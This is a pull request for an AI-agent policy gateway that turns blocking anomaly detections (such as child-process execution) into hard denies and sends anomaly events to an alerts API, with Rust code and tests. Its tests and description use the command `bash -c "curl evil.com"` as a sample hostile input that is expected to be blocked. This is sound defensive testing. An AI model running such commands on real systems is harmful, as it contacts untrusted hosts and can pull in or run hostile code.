### PR TITLE
[AAASM-3384] 🐛 (aa-gateway): Enforce anomaly Block as deny + route AnomalyEvents to alerts

### DIFF
--- a/aa-api/src/alerts/capture.rs
+++ b/aa-api/src/alerts/capture.rs
@@ -5,6 +5,7 @@ use std::sync::Arc;
 use tokio::sync::broadcast;
 
 use aa_gateway::alerts::SecretAlert;
+use aa_gateway::anomaly::AnomalyEvent;
 use aa_gateway::budget::types::BudgetAlert;
 
 use super::AlertStore;
@@ -62,6 +63,39 @@ pub fn spawn_secret_alert_capture(
                 }
                 Err(broadcast::error::RecvError::Closed) => {
                     tracing::info!("secret-alert broadcast channel closed, stopping capture task");
+                    break;
+                }
+            }
+        }
+    })
+}
+
+/// Spawn a background task that subscribes to the anomaly-detection event
+/// broadcast and records each detection into the alert store (AAASM-3384).
+///
+/// The gateway's anomaly engine broadcasts an [`AnomalyEvent`] on every live
+/// detection (AAASM-3378). This task mirrors [`spawn_secret_alert_capture`]:
+/// it drains that broadcast into the store so anomalies surface via
+/// `GET /api/v1/alerts`. Same lifecycle and error handling as the sibling
+/// capture tasks.
+pub fn spawn_anomaly_alert_capture(
+    mut rx: broadcast::Receiver<AnomalyEvent>,
+    store: Arc<dyn AlertStore>,
+) -> tokio::task::JoinHandle<()> {
+    tokio::spawn(async move {
+        loop {
+            match rx.recv().await {
+                Ok(event) => {
+                    store.record_anomaly(&event);
+                }
+                Err(broadcast::error::RecvError::Lagged(count)) => {
+                    tracing::warn!(
+                        count,
+                        "anomaly-alert capture task lagged behind broadcast, skipped {count} alerts"
+                    );
+                }
+                Err(broadcast::error::RecvError::Closed) => {
+                    tracing::info!("anomaly broadcast channel closed, stopping capture task");
                     break;
                 }
             }

--- a/aa-api/src/alerts/mod.rs
+++ b/aa-api/src/alerts/mod.rs
@@ -16,6 +16,7 @@ pub mod store;
 pub use event::AlertEvent;
 
 use aa_gateway::alerts::SecretAlert;
+use aa_gateway::anomaly::{AnomalyEvent, AnomalyResponse};
 use aa_gateway::budget::types::BudgetAlert;
 use serde::Serialize;
 use tokio::sync::broadcast;
@@ -125,6 +126,11 @@ pub enum AlertCategory {
     /// Alert produced by the rule engine — carries `rule_context` with
     /// the rule snapshot, routing log, and dedup state (AAASM-1385).
     Rule,
+    /// Behavioral anomaly detected by the gateway's anomaly engine
+    /// (AAASM-3384). Surfaces detections such as child-process execution,
+    /// credential-leak attempts, and behavior spikes through the public
+    /// alerts API alongside budget and secret alerts.
+    Anomaly,
 }
 
 impl std::fmt::Display for AlertCategory {
@@ -133,6 +139,7 @@ impl std::fmt::Display for AlertCategory {
             AlertCategory::Budget => write!(f, "budget"),
             AlertCategory::SecretDetected => write!(f, "secret_detected"),
             AlertCategory::Rule => write!(f, "rule"),
+            AlertCategory::Anomaly => write!(f, "anomaly"),
         }
     }
 }
@@ -203,6 +210,61 @@ pub fn stored_secret_alert_from(alert: &SecretAlert, id: String, timestamp: Stri
         updated_at: None,
         detected_pattern_type: Some(kind.as_str().to_string()),
         redacted_value: Some(alert.redacted_label()),
+        first_fired_at: timestamp,
+        resolved_at: None,
+        rule_context: None,
+        rule_snapshot: None,
+    }
+}
+
+/// Map an [`AnomalyResponse`] to the public [`AlertSeverity`] used for
+/// anomaly alerts (AAASM-3384).
+///
+/// Block / Quarantine outcomes actually stop the action, so they surface as
+/// `Critical`; `Pause` (suspend the agent) is a `Warning`; `Alert` (notify
+/// only) is informational.
+pub fn severity_from_anomaly_response(response: AnomalyResponse) -> AlertSeverity {
+    match response {
+        AnomalyResponse::Block | AnomalyResponse::Quarantine => AlertSeverity::Critical,
+        AnomalyResponse::Pause => AlertSeverity::Warning,
+        AnomalyResponse::Alert => AlertSeverity::Info,
+    }
+}
+
+/// Build a human-readable message for an [`AnomalyEvent`].
+fn build_anomaly_alert_message(event: &AnomalyEvent) -> String {
+    format!(
+        "Anomaly detected ({:?}) for agent {}: {} [response: {:?}]",
+        event.anomaly_type,
+        format_agent_id(&event.agent_id),
+        event.description,
+        event.response,
+    )
+}
+
+/// Convert an [`AnomalyEvent`] into a [`StoredAlert`] with the given ID and
+/// timestamp (AAASM-3384). Severity is derived from the anomaly's response
+/// action; the category is [`AlertCategory::Anomaly`].
+///
+/// Security invariant: the event carries only an anomaly classification and a
+/// description — no raw payload bytes — so nothing sensitive is stored here.
+pub fn stored_anomaly_alert_from(event: &AnomalyEvent, id: String, timestamp: String) -> StoredAlert {
+    StoredAlert {
+        id,
+        severity: severity_from_anomaly_response(event.response),
+        category: AlertCategory::Anomaly,
+        message: build_anomaly_alert_message(event),
+        agent_id: format_agent_id(&event.agent_id),
+        team_id: None,
+        timestamp: timestamp.clone(),
+        threshold_pct: 0,
+        spent_usd: 0.0,
+        limit_usd: 0.0,
+        status: "unresolved".to_string(),
+        prior_status: None,
+        updated_at: None,
+        detected_pattern_type: Some(format!("{:?}", event.anomaly_type)),
+        redacted_value: None,
         first_fired_at: timestamp,
         resolved_at: None,
         rule_context: None,
@@ -366,6 +428,13 @@ pub trait AlertStore: Send + Sync {
     /// with no window expiry — `dedup_or_record_rule_alert` (AAASM-1627)
     /// is the dedup-aware entry point.
     fn record_rule_alert(&self, seed: &RuleAlertSeed) -> String;
+
+    /// Record a behavioral-anomaly alert (AAASM-3384), returning the
+    /// assigned ULID. The stored alert has `category: AlertCategory::Anomaly`
+    /// and a severity derived from the anomaly's response action. Called by
+    /// `aa-api::alerts::capture::spawn_anomaly_alert_capture` so anomalies
+    /// detected by the gateway surface via `GET /api/v1/alerts`.
+    fn record_anomaly(&self, event: &AnomalyEvent) -> String;
 
     /// Record a rule alert with deduplication.
     ///

--- a/aa-api/src/alerts/store.rs
+++ b/aa-api/src/alerts/store.rs
@@ -106,6 +106,22 @@ impl AlertStore for InMemoryAlertStore {
         id
     }
 
+    fn record_anomaly(&self, event: &aa_gateway::anomaly::AnomalyEvent) -> String {
+        let id = self.next_id();
+        let timestamp = chrono::Utc::now().to_rfc3339();
+        let stored = super::stored_anomaly_alert_from(event, id.clone(), timestamp);
+
+        {
+            let mut buf = self.alerts.write().expect("alert store lock poisoned");
+            if buf.len() >= self.capacity {
+                buf.pop_front();
+            }
+            buf.push_back(stored.clone());
+        }
+        let _ = self.event_tx.send(AlertEvent::Fire(stored));
+        id
+    }
+
     fn record_rule_alert(&self, seed: &RuleAlertSeed) -> String {
         let id = self.next_id();
         let timestamp = chrono::Utc::now().to_rfc3339();

--- a/aa-api/src/events.rs
+++ b/aa-api/src/events.rs
@@ -5,6 +5,7 @@
 //! layer (and downstream WebSocket streaming) can subscribe to.
 
 use aa_gateway::alerts::SecretAlert;
+use aa_gateway::anomaly::AnomalyEvent;
 use aa_gateway::budget::types::BudgetAlert;
 use aa_runtime::approval::ApprovalRequest;
 use aa_runtime::pipeline::event::PipelineEvent;
@@ -51,6 +52,11 @@ pub struct EventBroadcast {
     /// `GovernanceEvent { event_type: OpsChange, ... }` so the dashboard
     /// can apply its per-op_id row merge and override auto-clear.
     ops_change_tx: broadcast::Sender<OpsChangeBroadcast>,
+    /// Behavioral-anomaly detections broadcast by the gateway's anomaly
+    /// engine (AAASM-3384). The anomaly-capture task subscribes here and
+    /// records each detection into the alert store so anomalies surface
+    /// via `GET /api/v1/alerts`, mirroring the budget/secret alert paths.
+    anomaly_tx: broadcast::Sender<AnomalyEvent>,
 }
 
 impl EventBroadcast {
@@ -62,6 +68,7 @@ impl EventBroadcast {
         let (budget_tx, _) = broadcast::channel(capacity);
         let (secret_tx, _) = broadcast::channel(capacity);
         let (ops_change_tx, _) = broadcast::channel(capacity);
+        let (anomaly_tx, _) = broadcast::channel(capacity);
         Self {
             pipeline_tx,
             approval_tx,
@@ -69,6 +76,7 @@ impl EventBroadcast {
             budget_tx,
             secret_tx,
             ops_change_tx,
+            anomaly_tx,
         }
     }
 
@@ -136,6 +144,20 @@ impl EventBroadcast {
     /// after every successful registry transition.
     pub fn ops_change_sender(&self) -> broadcast::Sender<OpsChangeBroadcast> {
         self.ops_change_tx.clone()
+    }
+
+    /// Subscribe to gateway anomaly-detection events (AAASM-3384).
+    pub fn subscribe_anomaly(&self) -> broadcast::Receiver<AnomalyEvent> {
+        self.anomaly_tx.subscribe()
+    }
+
+    /// Get a clone of the anomaly-detection event sender (AAASM-3384).
+    ///
+    /// The same sender is handed to the gateway's `PolicyServiceImpl` via
+    /// `with_anomaly_detection` so a single broadcast feeds both the live
+    /// enforcement path and the alert-capture task in one process.
+    pub fn anomaly_sender(&self) -> broadcast::Sender<AnomalyEvent> {
+        self.anomaly_tx.clone()
     }
 }
 

--- a/aa-api/src/server.rs
+++ b/aa-api/src/server.rs
@@ -78,6 +78,13 @@ pub async fn run_server(config: ApiConfig, state: AppState) -> Result<(), Box<dy
     let _secret_alert_capture_handle =
         crate::alerts::capture::spawn_secret_alert_capture(secret_rx, state.alert_store.clone());
 
+    // Spawn background task to capture anomaly detections into the alert
+    // store (AAASM-3384) so gateway anomalies surface via GET /api/v1/alerts,
+    // mirroring the budget/secret capture tasks above.
+    let anomaly_rx = state.events.subscribe_anomaly();
+    let _anomaly_alert_capture_handle =
+        crate::alerts::capture::spawn_anomaly_alert_capture(anomaly_rx, state.alert_store.clone());
+
     // Spawn background task to restore alerts when their silence expires (AAASM-1646 / AAASM-1647).
     let _silence_expiry_handle = crate::alerts::silence_watcher::spawn_silence_expiry_watcher(
         state.silence_store.clone(),

--- a/aa-api/tests/anomaly_alerts.rs
+++ b/aa-api/tests/anomaly_alerts.rs
@@ -1,0 +1,140 @@
+//! AAASM-3384 — gateway anomaly detections flow end-to-end into the public
+//! alerts API, and a block-equivalent anomaly is enforced as a CheckAction
+//! Deny.
+//!
+//! This is the cross-crate proof for the two gaps the ticket closes:
+//!   1. A detected `Block` anomaly (`ChildProcessExecution`) turns an
+//!      otherwise-allowed `CheckAction` into a hard `Deny` (enforcement).
+//!   2. The same detection is routed onto the shared anomaly broadcast and
+//!      captured into the `AlertStore`, so it surfaces via `GET /api/v1/alerts`
+//!      (alert pipeline), mirroring the budget/secret alert delivery.
+//!
+//! The gateway `PolicyServiceImpl` and the aa-api alert-capture task share a
+//! single `EventBroadcast::anomaly_sender()` — exactly the single-process
+//! wiring `run_server` performs — so driving one live `check_action` proves
+//! both halves at once.
+
+mod common;
+
+use std::io::Write;
+use std::sync::atomic::AtomicU64;
+use std::sync::Arc;
+use std::time::Duration;
+
+use aa_gateway::anomaly::{AnomalyConfig, AnomalyDetector};
+use aa_gateway::service::PolicyServiceImpl;
+use aa_gateway::PolicyEngine;
+use aa_proto::assembly::common::v1::{ActionType, AgentId as ProtoAgentId, Decision};
+use aa_proto::assembly::policy::v1::policy_service_server::PolicyService;
+use aa_proto::assembly::policy::v1::{action_context::Action, ActionContext, CheckActionRequest, ProcessExecContext};
+use axum::body::Body;
+use axum::http::{Request, StatusCode};
+use tower::ServiceExt;
+
+const ALLOW_TEST_TOOL_POLICY: &str = r#"
+version: "1"
+tools:
+  test_tool:
+    allow: true
+"#;
+
+fn process_exec_request(command: &str) -> CheckActionRequest {
+    CheckActionRequest {
+        agent_id: Some(ProtoAgentId {
+            org_id: "org".into(),
+            team_id: "team-pioneer".into(),
+            agent_id: "agent-1".into(),
+        }),
+        credential_token: "tok".into(),
+        trace_id: "trace-anomaly".into(),
+        span_id: "span-1".into(),
+        action_type: ActionType::ProcessExec as i32,
+        context: Some(ActionContext {
+            action: Some(Action::ProcessExec(ProcessExecContext {
+                command: command.into(),
+                args: vec![],
+            })),
+        }),
+        caller_agent_id: None,
+    }
+}
+
+/// Build a gateway `PolicyServiceImpl` whose anomaly broadcast is the same
+/// channel the aa-api `EventBroadcast` exposes — the single-process wiring
+/// `run_server` performs.
+fn gateway_service_sharing_anomaly_channel(
+    anomaly_tx: tokio::sync::broadcast::Sender<aa_gateway::anomaly::AnomalyEvent>,
+) -> Arc<PolicyServiceImpl> {
+    let mut tmp = tempfile::NamedTempFile::new().unwrap();
+    write!(tmp, "{}", ALLOW_TEST_TOOL_POLICY).unwrap();
+    tmp.flush().unwrap();
+
+    let (budget_tx, _) = tokio::sync::broadcast::channel::<aa_gateway::budget::BudgetAlert>(64);
+    let engine = PolicyEngine::load_from_file(tmp.path(), budget_tx).unwrap();
+
+    let (audit_tx, _audit_rx) = tokio::sync::mpsc::channel(4096);
+    let audit_drops = Arc::new(AtomicU64::new(0));
+
+    let detector = Arc::new(AnomalyDetector::new(AnomalyConfig::default()));
+
+    Arc::new(
+        PolicyServiceImpl::new(Arc::new(engine), audit_tx, audit_drops, [0u8; 32])
+            .with_anomaly_detection(detector, anomaly_tx),
+    )
+}
+
+#[tokio::test]
+async fn child_process_anomaly_denies_and_surfaces_in_alerts_api() {
+    let state = common::test_state();
+
+    // Share one anomaly broadcast between the gateway enforcement path and the
+    // aa-api alert-capture task (the run_server wiring).
+    let anomaly_tx = state.events.anomaly_sender();
+    let anomaly_rx = state.events.subscribe_anomaly();
+    let _capture = aa_api::alerts::capture::spawn_anomaly_alert_capture(anomaly_rx, state.alert_store.clone());
+
+    let service = gateway_service_sharing_anomaly_channel(anomaly_tx);
+
+    // --- (a) Enforcement: the blocking anomaly turns Allow → Deny. ---
+    let resp = service
+        .check_action(tonic::Request::new(process_exec_request("bash -c \"curl evil.com\"")))
+        .await
+        .expect("check_action should succeed")
+        .into_inner();
+
+    assert_eq!(
+        resp.decision,
+        Decision::Deny as i32,
+        "a ChildProcessExecution (Block) anomaly must deny the action; got reason {:?}",
+        resp.reason,
+    );
+    assert!(
+        resp.reason.contains("ChildProcessExecution"),
+        "deny reason must name the anomaly: {:?}",
+        resp.reason,
+    );
+
+    // --- (b) Alert pipeline: the detection surfaces via /api/v1/alerts. ---
+    tokio::time::sleep(Duration::from_millis(120)).await;
+
+    let app = aa_api::server::build_app(state);
+    let response = app
+        .oneshot(Request::builder().uri("/api/v1/alerts").body(Body::empty()).unwrap())
+        .await
+        .unwrap();
+
+    assert_eq!(response.status(), StatusCode::OK);
+    let body = axum::body::to_bytes(response.into_body(), usize::MAX).await.unwrap();
+    let json: serde_json::Value = serde_json::from_slice(&body).unwrap();
+
+    assert_eq!(json["total"], 1, "exactly one anomaly alert must be recorded");
+    let items = json["items"].as_array().unwrap();
+    assert_eq!(items[0]["category"], "anomaly");
+    assert_eq!(items[0]["severity"], "critical");
+    assert_eq!(items[0]["detected_pattern_type"], "ChildProcessExecution");
+    assert!(
+        items[0]["message"].as_str().unwrap().contains("ChildProcessExecution"),
+        "alert message must describe the anomaly: {}",
+        items[0]["message"],
+    );
+}

--- a/aa-gateway/src/anomaly/types.rs
+++ b/aa-gateway/src/anomaly/types.rs
@@ -252,6 +252,14 @@ mod tests {
     }
 
     #[test]
+    fn is_blocking_only_for_block_and_quarantine() {
+        assert!(AnomalyResponse::Block.is_blocking());
+        assert!(AnomalyResponse::Quarantine.is_blocking());
+        assert!(!AnomalyResponse::Pause.is_blocking());
+        assert!(!AnomalyResponse::Alert.is_blocking());
+    }
+
+    #[test]
     fn anomaly_event_stores_fields() {
         use aa_core::AgentId;
         let event = AnomalyEvent {

--- a/aa-gateway/src/anomaly/types.rs
+++ b/aa-gateway/src/anomaly/types.rs
@@ -80,6 +80,17 @@ impl AnomalyResponse {
             AnomalyType::CrossAgentIdentitySpoofing => Self::Alert,
         }
     }
+
+    /// Whether this response must block the current action (turn an otherwise
+    /// `Allow` decision into a hard `Deny`).
+    ///
+    /// `Block` and `Quarantine` both deny the in-flight action — `Quarantine`
+    /// additionally isolates the agent. `Pause` and `Alert` do not block the
+    /// current action (`Pause` suspends future actions; `Alert` only notifies),
+    /// so they are not block-equivalent here. AAASM-3384.
+    pub fn is_blocking(self) -> bool {
+        matches!(self, Self::Block | Self::Quarantine)
+    }
 }
 
 /// An anomaly detection event emitted when the engine identifies suspicious

--- a/aa-gateway/src/service/policy_service.rs
+++ b/aa-gateway/src/service/policy_service.rs
@@ -1197,15 +1197,17 @@ impl PolicyServiceImpl {
     /// 4. On a detection, execute [`AnomalyResponder::respond`] (logs the
     ///    response action) and broadcast the [`AnomalyEvent`] so subscribers
     ///    (and tests) observe the live detection.
-    fn maybe_detect_anomaly(&self, req: &CheckActionRequest, eval: &EvaluationResult) {
-        let Some(hook) = self.anomaly.as_ref() else {
-            return;
-        };
+    ///
+    /// Returns the detected [`AnomalyEvent`] (if any) so the caller can enforce
+    /// a block-equivalent response as a hard `Deny` (AAASM-3384). Returns `None`
+    /// when no hook is attached or no anomaly fired.
+    fn maybe_detect_anomaly(&self, req: &CheckActionRequest, eval: &EvaluationResult) -> Option<AnomalyEvent> {
+        let hook = self.anomaly.as_ref()?;
         let (ctx, action) = match convert::request_to_core(req) {
             Ok(pair) => pair,
             Err(e) => {
                 tracing::warn!(error = %e, "failed to rebuild ctx for anomaly detection");
-                return;
+                return None;
             }
         };
         let agent_id = ctx.agent_id;
@@ -1226,11 +1228,57 @@ impl PolicyServiceImpl {
 
         let has_pii = !eval.credential_findings.is_empty();
         let allowlist = self.engine.network_allowlist();
-        if let Some(event) = hook.detector.detect(agent_id, &action, has_pii, &allowlist, None) {
-            AnomalyResponder::respond(&event);
-            if let Err(err) = hook.event_tx.send(event) {
-                tracing::trace!(error = %err, "no subscribers for AnomalyEvent broadcast");
-            }
+        let event = hook.detector.detect(agent_id, &action, has_pii, &allowlist, None)?;
+        AnomalyResponder::respond(&event);
+        if let Err(err) = hook.event_tx.send(event.clone()) {
+            tracing::trace!(error = %err, "no subscribers for AnomalyEvent broadcast");
+        }
+        Some(event)
+    }
+
+    /// AAASM-3384 — turn a block-equivalent anomaly detection into a hard
+    /// `Deny` on an otherwise-allowed action.
+    ///
+    /// Detection previously only logged + broadcast; a `Block` (or
+    /// `Quarantine`) outcome did not actually stop the action. This applies the
+    /// responder's enforcement intent to the live `CheckAction` response: if a
+    /// blocking anomaly fired and the current decision is `Allow`, the response
+    /// is rewritten to `Deny` with a clear, operator-readable reason.
+    ///
+    /// Non-Allow responses (already Deny / Redact / Pending) are left untouched
+    /// — the action is already governed, and we never weaken an existing
+    /// decision. Returns the (possibly rewritten) response.
+    fn enforce_anomaly_block(
+        &self,
+        response: CheckActionResponse,
+        event: Option<&AnomalyEvent>,
+    ) -> CheckActionResponse {
+        let Some(event) = event else {
+            return response;
+        };
+        if !event.response.is_blocking() {
+            return response;
+        }
+        if response.decision != aa_proto::assembly::common::v1::Decision::Allow as i32 {
+            return response;
+        }
+        let reason = format!(
+            "anomaly detected ({:?}): {} — blocked by anomaly responder",
+            event.anomaly_type, event.description
+        );
+        tracing::warn!(
+            anomaly_type = ?event.anomaly_type,
+            response = ?event.response,
+            reason = %reason,
+            "enforcing anomaly block: rewriting Allow → Deny"
+        );
+        CheckActionResponse {
+            decision: aa_proto::assembly::common::v1::Decision::Deny as i32,
+            reason,
+            policy_rule: "anomaly_detection".to_string(),
+            approval_id: String::new(),
+            redact: None,
+            decision_latency_us: response.decision_latency_us,
         }
     }
 
@@ -1345,6 +1393,12 @@ impl PolicyService for PolicyServiceImpl {
                 convert::eval_result_to_response(&eval, latency_us, &policy_rule)
             };
 
+        // AAASM-3378 / AAASM-3384: run the live anomaly detector over the
+        // evaluated action, then enforce a block-equivalent detection as a hard
+        // Deny before the ops transition / audit observe the final decision.
+        let anomaly_event = self.maybe_detect_anomaly(&req, &eval);
+        let response = self.enforce_anomaly_block(response, anomaly_event.as_ref());
+
         // AAASM-1422 / AAASM-1657: transition the registry op to match the
         // final policy decision. Allow → Running, Deny → Terminated.
         // RequiresApproval is handled by the approval queue path above and
@@ -1379,9 +1433,6 @@ impl PolicyService for PolicyServiceImpl {
         // AAASM-3353: accrue LLM-call cost so daily / monthly budget limits fire.
         self.maybe_accrue_llm_spend(&req, &response);
 
-        // AAASM-3378: run the live anomaly detector over the evaluated action.
-        self.maybe_detect_anomaly(&req, &eval);
-
         // Fire-and-forget audit entry — never blocks the response.
         self.record_audit(&req, &response, &eval, shadow_event.as_ref()).await;
 
@@ -1411,11 +1462,13 @@ impl PolicyService for PolicyServiceImpl {
             } else {
                 convert::eval_result_to_response(&eval, latency_us, &policy_rule)
             };
+            // AAASM-3378 / AAASM-3384: detect + enforce a block-equivalent
+            // anomaly as a hard Deny in batch mode too.
+            let anomaly_event = self.maybe_detect_anomaly(req, &eval);
+            let resp = self.enforce_anomaly_block(resp, anomaly_event.as_ref());
             self.maybe_suspend_agent(req, deny_action).await;
             // AAASM-3353: accrue LLM-call cost so budget limits fire in batch mode too.
             self.maybe_accrue_llm_spend(req, &resp);
-            // AAASM-3378: run the live anomaly detector in batch mode too.
-            self.maybe_detect_anomaly(req, &eval);
             self.record_audit(req, &resp, &eval, shadow_event.as_ref()).await;
             responses.push(resp);
         }

--- a/aa-gateway/tests/policy_service_anomaly_test.rs
+++ b/aa-gateway/tests/policy_service_anomaly_test.rs
@@ -106,6 +106,120 @@ fn tool_call_request(args: &str) -> CheckActionRequest {
     }
 }
 
+/// Build a service WITHOUT an anomaly hook attached, sharing the same
+/// permissive `ALLOW_TEST_TOOL_POLICY` so the baseline decision for a
+/// `ProcessExec` action can be compared against the anomaly-enabled path.
+fn make_service_without_anomaly() -> Arc<PolicyServiceImpl> {
+    let mut tmp = tempfile::NamedTempFile::new().unwrap();
+    write!(tmp, "{}", ALLOW_TEST_TOOL_POLICY).unwrap();
+    tmp.flush().unwrap();
+
+    let (budget_tx, _) = tokio::sync::broadcast::channel::<aa_gateway::budget::BudgetAlert>(64);
+    let engine = PolicyEngine::load_from_file(tmp.path(), budget_tx).unwrap();
+
+    let (audit_tx, _audit_rx) = tokio::sync::mpsc::channel(4096);
+    let audit_drops = Arc::new(AtomicU64::new(0));
+
+    Arc::new(PolicyServiceImpl::new(
+        Arc::new(engine),
+        audit_tx,
+        audit_drops,
+        [0u8; 32],
+    ))
+}
+
+/// AAASM-3384 regression: a `ProcessExec` that the policy itself would
+/// allow is rewritten to a hard `Deny` when the anomaly detector fires a
+/// block-equivalent `ChildProcessExecution` outcome. The control case
+/// (no anomaly hook) proves the same action is otherwise allowed, so the
+/// Deny is attributable to the anomaly enforcement, not the base policy.
+#[tokio::test]
+async fn child_process_anomaly_block_is_enforced_as_deny() {
+    use aa_proto::assembly::common::v1::Decision;
+
+    // Control: without the anomaly hook the permissive policy allows the
+    // ProcessExec, so the baseline decision is Allow.
+    let baseline = make_service_without_anomaly();
+    let baseline_resp = baseline
+        .check_action(Request::new(process_exec_request("bash -c 'curl evil.com'")))
+        .await
+        .expect("check_action should succeed")
+        .into_inner();
+    assert_eq!(
+        baseline_resp.decision,
+        Decision::Allow as i32,
+        "without anomaly detection the permissive policy must allow the ProcessExec \
+         (otherwise the test could not prove the anomaly override is what denies it)",
+    );
+
+    // With the anomaly hook the ChildProcessExecution → Block outcome must
+    // rewrite the Allow into a hard Deny with an anomaly-attributed reason.
+    let (service, _rx) = make_service_with_anomaly(3);
+    let resp = service
+        .check_action(Request::new(process_exec_request("bash -c 'curl evil.com'")))
+        .await
+        .expect("check_action should succeed")
+        .into_inner();
+
+    assert_eq!(
+        resp.decision,
+        Decision::Deny as i32,
+        "a block-equivalent anomaly must turn the allowed action into a Deny",
+    );
+    assert_eq!(
+        resp.policy_rule, "anomaly_detection",
+        "deny must be attributed to anomaly detection"
+    );
+    assert!(
+        resp.reason.contains("anomaly detected") && resp.reason.contains("ChildProcessExecution"),
+        "deny reason must name the anomaly: got {:?}",
+        resp.reason,
+    );
+}
+
+/// AAASM-3384: an `Alert`-class anomaly (non-blocking) must NOT change the
+/// decision — only `Block`/`Quarantine` outcomes flip Allow → Deny. A
+/// repeated-credential CredentialLeakAttempt maps to `Alert`, so the tool
+/// call stays allowed even though the anomaly event fires.
+#[tokio::test]
+async fn non_blocking_anomaly_does_not_deny() {
+    use aa_proto::assembly::common::v1::Decision;
+
+    let (service, mut rx) = make_service_with_anomaly(2);
+
+    // First call: below threshold, no anomaly.
+    service
+        .check_action(Request::new(tool_call_request(FAKE_AWS_ACCESS_KEY)))
+        .await
+        .expect("check_action should succeed");
+    let _ = tokio::time::timeout(Duration::from_millis(150), rx.recv()).await;
+
+    // Second call: crosses the threshold → CredentialLeakAttempt (Alert).
+    let resp = service
+        .check_action(Request::new(tool_call_request(FAKE_AWS_ACCESS_KEY)))
+        .await
+        .expect("check_action should succeed")
+        .into_inner();
+
+    let event = tokio::time::timeout(Duration::from_secs(1), rx.recv())
+        .await
+        .expect("anomaly event must arrive")
+        .expect("broadcast must yield an event");
+    assert_eq!(event.anomaly_type, AnomalyType::CredentialLeakAttempt);
+
+    // The alert path is redaction-driven; the key invariant is that a
+    // non-blocking anomaly never produces an anomaly-attributed Deny.
+    assert_ne!(
+        resp.policy_rule, "anomaly_detection",
+        "a non-blocking (Alert) anomaly must not produce an anomaly-attributed Deny",
+    );
+    assert_ne!(
+        resp.decision,
+        Decision::Deny as i32,
+        "an Alert-class anomaly must not block the action",
+    );
+}
+
 #[tokio::test]
 async fn check_action_emits_anomaly_event_for_child_process_execution() {
     let (service, mut rx) = make_service_with_anomaly(3);


### PR DESCRIPTION
## Description

AAASM-3378 enabled the gateway `AnomalyDetector` on the serve path, but detection only **logged**. This PR closes the two remaining enforcement gaps:

1. **Enforce `Block` as a real deny.** When the anomaly responder returns a block-equivalent outcome (`Block` or `Quarantine`) for a `CheckAction`, the response is now rewritten from `Allow` to a hard `Deny` with a clear, anomaly-attributed reason (`policy_rule = "anomaly_detection"`). A detected blocking anomaly (e.g. `ChildProcessExecution` for `bash -c "curl evil.com"`) actually blocks the action. Non-blocking outcomes (`Pause`, `Alert`) never weaken an existing decision; already-denied / redact / pending decisions are left untouched.
2. **Route `AnomalyEvent`s to the alert pipeline.** The gateway broadcasts every detection on the `AnomalyEvent` channel (the receiver previously retained but unused in `server.rs setup_anomaly`). `aa-api` now mirrors its budget/secret alert delivery: a new `anomaly` alert channel on `EventBroadcast`, an `AlertStore::record_anomaly` entry point, and a `spawn_anomaly_alert_capture` task spawned in `run_server`, so detections surface via `GET /api/v1/alerts`.

The gateway `PolicyServiceImpl` and the aa-api capture task share a single `EventBroadcast::anomaly_sender()` — the same single-process wiring `run_server` performs — so one live `check_action` drives both halves.

### Design notes / assumptions
- **No proto change** (per spec). `AnomalyResponse::is_blocking()` maps `Block`/`Quarantine` → block; the enforcement override reuses the existing `CheckActionResponse` Deny shape.
- The gateway gRPC server and the aa-api REST server are separate processes today; the alert-routing wiring lives in `aa-api` (which already depends on `aa-gateway`) and shares the broadcast so the budget/secret delivery pattern is preserved exactly. Follow-up (not in scope): a combined single-process entrypoint that mounts the gRPC service + aa-api alert capture together for ops.

## Type of Change

- [x] 🐛 Bug fix

## Breaking Changes

- [x] No

(`AlertCategory` gains a new `Anomaly` variant; consumers using a non-exhaustive match are unaffected.)

## Related Issues

- Related Jira ticket: AAASM-3384

## Testing

- [x] Unit tests added / updated
- [x] Integration tests added / updated

End-to-end proof (`aa-api::anomaly_alerts`): a live gRPC `check_action` for `PROCESS_EXEC bash -c "curl evil.com"` returns **DENY** (reason names `ChildProcessExecution`) **and** the detection surfaces via `GET /api/v1/alerts` as `category: anomaly`, `severity: critical`, `detected_pattern_type: ChildProcessExecution`.

Added regression tests:
- `aa-gateway::policy_service_anomaly_test::child_process_anomaly_block_is_enforced_as_deny` — control (no hook → Allow) vs. enabled (anomaly → Deny).
- `aa-gateway::policy_service_anomaly_test::non_blocking_anomaly_does_not_deny` — `Alert`-class anomaly does not block.
- `aa-gateway::anomaly::types` unit test for `is_blocking`.

Results: `cargo nextest run -p aa-gateway` → **1142 passed**. `cargo nextest run -p aa-api` → **583 passed**; the only failure is the pre-existing wall-clock-sensitive `http_policy_invalidation::http_policy_mutation_invalidates_subscribed_l1_within_100ms` (100 ms budget), which passes deterministically in isolation and is unrelated to this change (L1 policy-invalidation path is untouched). `cargo fmt` + `cargo clippy --all-targets` clean for both crates.

Reference QA evidence: `agent-assembly-integration-tests/verification-reports/base-branch-2026-06/`.

## Checklist

- [x] Code follows project style guidelines (`cargo fmt`, `cargo clippy`)
- [x] Self-review of the diff completed
- [x] Documentation updated if behaviour changed (rustdoc on new APIs)
- [ ] All CI checks passing
- [x] Commits are small and follow the Gitmoji convention

Closes AAASM-3384
